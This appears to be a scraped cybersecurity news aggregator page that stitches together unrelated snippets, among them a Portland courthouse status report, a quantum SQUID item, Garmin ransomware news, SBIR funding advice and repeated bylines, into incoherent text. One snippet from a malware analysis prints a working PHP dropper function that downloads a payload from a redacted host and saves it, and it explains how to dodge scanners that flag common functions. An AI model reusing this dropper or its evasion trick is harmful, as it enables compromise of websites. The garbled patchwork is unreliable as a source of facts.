F1TYM1

Written by Shannon Vavra
Aug 7, 2020 | CYBERSCOOP

Bottom line:

Activity in the vicinity of the Mark O. Hatfield Federal Courthouse once again remained peaceful – in sharp contrast to the violent nightly siege of previous weeks. Thursday evening marked a fifth consecutive night with zero attacks directed at federal officers or federal property. The change is directly attributable to the long-awaited cooperation from state and local law enforcement, which began last week, but should have been the case all along. 

When possible, an attacker will want to avoid using specific functions in their PHP code that they know are more likely to be flagged by a scanner. Some examples of suspicious functions commonly detected include system and file_put_contents.

In this malware dropper file we recently found on a compromised website, the attacker chose to create a user-defined PHP function getFile to accomplish the same task as file_put_contents. Their objective is to essentially download and store binary data from a third party resource without being detected.

function getFile($url, $path) { $newfname = $path; $file = fopen ($url, 'rb'); if ($file) { $newf = fopen ($newfname, 'wb'); if ($newf) { while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8), 1024 * 8); }}} if ($file) { fclose($file); } if ($newf) { fclose($newf); }} getFile("hxxp://[redacted]/payload.zip","ss.zip");

There’s a new SQUID:

A new device that relies on flowing clouds of ultracold atoms promises potential tests of the intersection between the weirdness of the quantum world and the familiarity of the macroscopic world we experience every day. The atomtronic Superconducting QUantum Interference Device (SQUID) is also potentially useful for ultrasensitive rotation measurements and as a component in quantum computers.

Written by Shannon Vavra
Aug 7, 2020 | CYBERSCOOP

Written by Shannon Vavra
Aug 7, 2020 | CYBERSCOOP

Expect to see ‘National Enquirer’ readers driving around in Rolls Royces and hopping private jets to their private islands.

On Thursday night, people in Russia and Iran started getting weird text messages. The texts offered people $10 million for information about cyber threats related to the upcoming U.S. election. It had a handy link where respondents could report tips. The U.S. State Department has admitted responsibility for the text messages, according to Reuters.

In this article, we will learn how we can use RegRipper to analyze the windows registry in the forensic investigation environment.

Written by Sean Lyngaas
Aug 7, 2020 | CYBERSCOOP

Security researchers warn about widespread vulnerabilities in protocol gateways, small devices that connect industrial machinery and sensors to TCP/IP networks that are used to automate and control them. New research published this week by Trend Micro and presented at the Black Hat USA virtual security conference highlights a new threat via protocol translation attacks and reveals 9 flaws found in protocol gateways from different vendors.

One of the best-kept secrets in the world of capital is that the federal government has billions of dollars it’s dying to give away to early-stage founders and inventors — and all you have to do is ask. Well, there’s a bit more to it than that, so here’s a guide to getting in the door of the massive Small Business Innovation Research program.

This year, at DEF CON 28 DEF CON Safe Mode, security researchers [Jiska Classen] and [Francesco Gringoli] gave a talk about inter-chip privilege escalation using wireless coexistence mechanisms. The title is catchy, sure, but what exactly is this about?

Garmin has confirmed that the recent outage its users experienced was indeed the result of a successful ransomware attack. However, the extent of the damage done is still unclear. The attack, which compromised Garmin’s servers for five days, impacted millions of users globally and will likely end up costing Garmin millions of dollars in lost productivity and reputation alone. While Garmin says that no customer data was leaked, Garmin’s call centers, web site, and cloud-based services such as Garmin Connect and FlyGarmin (a commercial aviation navigation service) were either taken offline or negatively impacted as a result of the attack.

Imagine buying a dress online because a piece of code sold you on its ‘flattering, feminine flair’ — or convinced you ‘romantic floral details’ would outline your figure with ‘timeless style’. The very same day your friend buy the same dress from the same website but she’s sold on a description of ‘vibrant tones’, ‘fresh cotton feel’ and ‘statement sleeves’.

Many thanks to Security BSides Athens for publishing their tremendous Security BSides Athens 2020 Conference Videos. Enjoy!

With stricter privacy regulations, evolving customer expectations, and growing work-from-home demands, organizations need a simple way to know, see, and manage their data. Luckily, we’ve got a few ideas. 

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. Based on research that Trend Micro released during Black Hat USA this past week, read about how some industrial robots have flaws that could make them vulnerable to advanced hackers, as well as the risks related to protocol gateways and how to secure these devices.